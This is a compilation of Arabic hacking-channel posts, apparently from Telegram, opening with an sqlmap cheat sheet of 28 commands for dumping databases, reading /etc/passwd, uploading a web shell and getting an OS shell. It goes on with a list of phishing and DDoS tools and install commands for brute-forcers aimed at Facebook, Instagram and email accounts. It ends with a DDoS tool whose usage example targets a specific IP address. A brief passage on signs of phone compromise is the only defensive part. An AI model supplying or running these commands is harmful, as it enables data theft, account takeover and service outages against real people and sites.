أوامر اختراق الموقع عن طريق اداة SQLMAP لاستغلال حقن SQL

لغة الاستعلامات الهيكلية ، والتي تُعرف باسم SQL ، هي لغة البرمجة الشائعة التي تسطرها معظم أنظمة إدارة قواعد البيانات. يوفر طريقة شائعة للتطبيق للوصول إلى البيانات الموجودة في قاعدة البيانات باستخدام مجموعة مشتركة من الأوامر التي يمكن لقاعدة البيانات فهمها.

يستغل المهاجمون قواعد البيانات هذه بجعلهم يخرجون معلومات لا ينبغي لهم عرضها. أحيانًا يكون هذا بسيطًا مثل المهاجم الذي يطلب معلومات مميزة من نظام إدارة قاعدة البيانات . في أحيان أخرى ، يستفيد من التكوينات الضعيفة من قبل مسؤولي قواعد البيانات.

من الاستطلاع إلى تغطية المسارات - 5 مراحل للقرصنة الأخلاقية
من الألف إلى الياء - مؤشر ثغرات الويب - معيار OWASP
من الألف إلى الياء - مجموعة أدوات الأمن السيبراني
قد يستفيد المهاجمون أيضًا من ثغرة أمنية في نظام إدارة قاعدة البيانات تسمح للمهاجم بعرض أو كتابة أوامر مميزة من قاعدة البيانات وإليها.

تقوم Sqlmap بأتمتة عملية اكتشاف واستغلال الثغرات الأمنية لحقن SQL والاستيلاء على خوادم قواعد البيانات. يأتي Sqlmap مزودًا بمحرك كشف ، بالإضافة إلى مجموعة واسعة من ميزات اختبار الاختراق (PT) التي تتراوح من بصمة قاعدة البيانات إلى الوصول إلى نظام الملفات الأساسي وتنفيذ الأوامر على نظام التشغيل عبر اتصالات خارج النطاق.

الصيغة الأساسية لاستخدام Sqlmap هي:

sqlmap -u URL - - وظيفة

فيما يلي قائمة بأهم أوامر SQLMAP المفيدة التي يمكنك استخدامها ضد هدفك الضعيف:

1. طلب ​​الحصول على

sqlmap -u http://example.com/page.php?id=1 --dbs
2. من ملف

sqlmap -r request.txt
3. الاختبار باستخدام نمط عناوين URL

sqlmap -u http://example.com/page/*/view --dbs
4. طلب ​​POST

sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username
5. استخدام ملفات تعريف الارتباط

sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=45634b63g643f563456g4356g" -u http://example.com/index.php?id=1
6. استخراج قواعد البيانات (تعداد قاعدة البيانات)

sqlmap -u http://example.com/page.php?id=1 --dbs
7. تحديد قاعدة البيانات الحالية

sqlmap -u http://example.com/page.php?id=1 --current-db
8. استخراج الجداول

sqlmap -u http://example.com/page.php?id=1 -D database --tables
9. استخراج الأعمدة

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns
10. إغراق البيانات

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C colum1,column2 --dump
11. تعدد

sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5
12. لا يوجد اتصال

sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection
13. اتصال HTTP المستمر

sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive
14. إخراج التنبؤ

sqlmap -u http://example.com/page.php?id=1 -D database -T user -c users,password --dump --predict-output
15. فحص الامتيازات

sqlmap -u http://example.com/page.php?id=1 --privileges
16. قراءة الملفات من الخادم

sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd
17. تحميل الملفات / شل

sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php
18. SQL شل

sqlmap -u http://example.com/page.php?id=1 --sql-shell
19. قذيفة نظام التشغيل

sqlmap -u http://example.com/page.php?id=1 --os-shell
20. إكس أمر نظام التشغيل بدون تحميل شل

sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"
21. باستخدام الوكيل

sqlmap --proxy="127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs
22. استخدام الوكيل مع أوراق الاعتماد

sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u http://example.com/page.php?id=1
23. الزحف

sqlmap -u http://example.com/ --crawl=1
24. الاستغلال في وضع الإسهاب

sqlmap -u http://example.com/page.php?id=1 -v 3
25. تجاوز WAF (جدار حماية تطبيق الويب)

sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask
26. مسح صفحة المصادقة القائمة على المفتاح

sqlmap -u http://example.com/page.php?id=1 --auth-file=
27. لاستخدام شبكة TOR الافتراضية

sqlmap -u http://example.com/page.php?id=1 --tor
28. المسح مع ارتفاع المخاطر والمستوى

sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5
♕----------------♕----------------♕
     ♡   ‌     ‌     ❍ㅤ    ⎙        ⌲       
ᶜᵒᵐᵐᵉⁿᵗ       ˢᵃᵛᵉ      ˡᶦᵏᵉ      ˢʰᵃʳ
المصدر ⚡
@ArabGathering

?‍☠️خمسين اداه اختراق Top 50 Hacking Tool

‏احتفظ بها لانك بالتأكيد سوف تحتاجها يوماً ما.

‏?Phishing Tools ادوات الاصطياد

‏1. SocialFish
‏2. ShellPhish
‏3. BlackEye
‏4. Weeman

‏?Information Gathering ادوات جمع المعلومات

‏5. Red Hawk
‏6. D-Tect
‏7. Lazy-Script
‏8. Pureblood Framework
‏9. ReconDog
‏10. Crips (Ip Tool)
‏11. EvilUrl IDN homograph
‏12. Lazymux
‏13. Tool - X
‏14. Angry Fuzzer
‏15. TheChoice
‏16. UserRecon
‏17. IPGeolocation-Trace Ip
‏18. Infoga-Collect Email-Info

‏?Vulnerability Analysis ادوات تحليل الثغرات

‏19. OWScan
‏20. CMS Map Vul-Scanner
‏21. Click-jacking Scanner
‏22. TM-Scanner
‏23. Androbug Framework
‏24. SQLI Scanner
‏25. Commix
‏26. WPSeku Tool
‏27. RouterSploit Framework
‏Technology_Center1
‏28. Nikto web server - Scanner
‏29. Creadmap-check login Emails

‏?Exploitation ادوات استهداف الثغرات

‏30. CMSeek Suit
‏31. Zarp-local Network Tool
‏32. TM-Venom
‏33. Metasploit Framework
‏34. A-Rat Exploit
‏35. Hulk (DDoS Tool)
‏36. Golden Eye (DDoS Tool)
‏37. Brutal

‏?Not Categorized ادوات منوعة

‏38. DarkFly-Tool
‏39. Apache2 - HTTP Server
‏40. Hash Cracker
‏41. Wordlist Generator
‏42. BruteSpray
‏43. KaliNetHunter
‏44. ChoiceBot
‏45. DarkSploit
‏Technology_Center1
‏46. Cyber Scan
‏47. Optiva Framework
‏48. Hakku Framework
‏49. Santet-Online
‏50. LazyFiglet
♕------------------♕------------------♕
     ♡   ‌     ‌     ❍ㅤ    ⎙        ⌲       
ᶜᵒᵐᵐᵉⁿᵗ       ˢᵃᵛᵉ      ˡᶦᵏᵉ      ˢʰᵃʳ
المصدر ?
https://t.me/WeHamza

?تخمين رمز الأسترداد للفيسبوك ?

pkg install python3
pkg install nano
pip3 install requests bs4
pkg install git
git clone https://github.com/yehi-hacker/WOLF.git
ls
cd WOLF
ls
chmod +x Script.py WOLF-16-YEHIA.py PROXY-VBN.py Encrypted.py
ls
chmod +x WOLF.py
python3 WOLF.py
♕------------------♕------------------♕
     ♡   ‌     ‌     ❍ㅤ    ⎙        ⌲       
ᶜᵒᵐᵐᵉⁿᵗ       ˢᵃᵛᵉ      ˡᶦᵏᵉ      ˢʰᵃʳ
المصدر ?
https://t.me/WeHamza

?السلام عليكم ورحمة الله وبركاته?

الأداة open source

هاذا ملف متخصص بالبروكسي prox

HTTP, socks5, socks4

طريقة التشغيل على Termux

pkg update

pkg install python3

pkg install unzip

unzip proxylist.zip

cd proxylist

python3 proxy.py

==========================
المصدر???
https://t.me/WeHamza

فيروس توتال VirusTotal 2023

فيروس توتال هو موقع إلكتروني يقدم مجاناً خدمة فحص ملفات الحاسوب المشتبه في كونها فيروسات أو ملفات من نوع «حصان طروادة» أو ملفات من نوع «دودة حاسوب» أو أي ملف يشتبه في أن يكون برنامج ضار بالنظام برمجيات خبيثة» وايضا يفحص الروابط الملغمه هل تريد أتمتة عمليات الإرسال؟ تحقق من واجهة برمجة التطبيقات (API) الخاصة بنا، أو قم بالوصول إلى مفتاح واجهة برمجة التطبيقات (API) الخاص بك.

الموقع الرسمي
https://www.virustotal.com/gui/home/upload
وده رابط تحميل البرنامج
https://t.me/LiberationofAlAqsa/321

في بعض الأحيان يقوم الهكر باستغلال الثغرات

الموجودة على جهازك ليقوموا بالتنصت عليك

ولكن كيف تعرف انه تم اختراق بنجاح

1_استهلاك البطارية بشكل سريع

(يعني الموبايل كان يمسك شحن ٥ ساعة من غير ماترجع تشحنه وصار يمسك ساعة أو ساعتين بس)

2_ثقل حركة استخدام الهاتف اثناء تصفح الانترنت

3_ظهور اعلانات على شاشة هاتفك اثناء تصفح الانترنت

(يعني من غير ماتستخدم تطبيق )

4_تثبيت تطبيقات تلقائية بدون موافقتك

5_ارتفاع درجة الحرارة وتوقف تشغيل نظام الهاتف

(اذا كنت تستخدم بيانات الهاتف بيختلف الموضوع )

6_تثبيت متجر تطبيقات غير معروف بدون موافقتك

7_ظهور الأرقام الشخصية في تطبيق الوتس اب بدون اسم

كل هذه العلامات او أكثر تظهر أثناء حدوث اختراق على هاتفك

apt update -y
apt upgrade -y
apt install git -y
git clone https://github.com/MrHacker-X/DevilX.git
cd DevilX
chmod +x *
bash setup.sh
devilx

————————-—-——-—--————
Brute Force Attack:-
[01] Instagram Brute Force
[02] Facebook Brute Force
[03] E-mail Brute Force

Information Gathering:-
[01] Track IP Location
[02] Get Phone Number Information
[03] get E-mail Information

Web Scrapping:-
[01] Scrap an web page
[02] Clone website Page
[03] Clone Website

Hash Cracking:-
[01] MD5
[02] SHA1
[03] SHA224
[04] SHA256
[05] SHA384
[06] SHA512

Strong Password Generator:-
Like this:

62RY4%HAnn5V
vX>fW%*9q37h
<=xk=XKK5z9?

hacking Tool Installer:-
[01] Metasploit
[02] nmap
[03] hydra
[04] BruteX
[05] AllHackingTools

etc
المصدر ??:-

الشكر للشاب Dark ×_
الانه من أعطاني الأداة
=========================
المصدر??‍?
https://t.me/WeHamza

❗فديو شرح تثبيت اداه Klar DDos هذه الاداه تتكون من سبع طبقات هجوم DDOS strong tool to stop servers and sites

رابط تثبيت الاداه
https://t.me/LiberationofAlAqsa/1130
=========================
المصدر ???
https://t.me/LiberationofAlAqsa

السلام عليكم ورحمه الله وبركاته

❗شرح تثبيت اداه Klar DDos هذه الاداه تتكون من سبع طبقات هجوم DDOS strong tool to stop servers and sites

❗شرح تثبيت اداه Klar DDos

pkg install python

git clone https://github.com/Dr-Data2/KlarDDos

cd KlarDDos

pip install -r installing.txt

python KlarDdos.py -h

python KlarDdos.py -i -p -l    

❗منظر واجهه المستخدم

│  -h : للمساعده                        
│   -i : اي بي السيرفر                       
│   -p : البورت المراد استهدافه                     
│   -l : عدد مستويات الهجوم           
│   -f : ايبي الزائف اختياري                         
│   -d : اخفاء وتقليل الرسائل المنبثقه

python KlarDdos.py -i اكتب هنا IP الموقع المراد استهدافه -p 80 -l 3

مثال / اضافه IP

python KlarDdos.py -i 104.26.4.178 -p 80 -l 3

رابط فيديو شرح تثبيت الاداه
https://t.me/LiberationofAlAqsa/1131
=========================
المصدر ???
https://t.me/LiberationofAlAqsa

❗تسريب من اداه DDoS Attack الجديده لاسقاط الموقع خلال 10 دقائق برجاء التفاعل مع القناه وزياده عدد المشتركين لتنزيل الاداه اليكم مع شرح فيديو مفصل عن تثبيت الاداه

المصدر ???
https://t.me/LiberationofAlAqsa